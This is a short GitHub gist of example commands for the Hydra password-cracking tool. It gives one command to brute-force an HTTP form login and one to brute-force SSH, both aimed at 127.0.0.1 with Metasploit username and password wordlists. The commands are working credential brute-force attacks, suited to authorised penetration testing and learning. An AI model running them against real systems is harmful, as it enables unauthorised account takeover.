Skip to content

Instantly share code, notes, and snippets.

@redknight99
Last active September 12, 2019 05:27
Show Gist options
  • Save redknight99/0b8a57f38b5d9a445a561b637271e173 to your computer and use it in GitHub Desktop.
Save redknight99/0b8a57f38b5d9a445a561b637271e173 to your computer and use it in GitHub Desktop.
A gist for simple Hydra ( https://github.com/vanhauser-thc/thc-hydra ) commands since their homepage is lacking examples / clarity. I'm planning on adding to this as time goes on.

Simple Post Brute Force Example

hydra 127.0.0.1 -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt http-form-post "/admin.php:=username^USER^&password=^PASS^:S=Good Password"

Simple SSH Brute Force Example

hydra 127.0.0.1 -L /usr/share/wordlists/metasploit/unix_users.txt -P /usr/share/wordlists/metasploit/unix_passwords.txt ssh

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment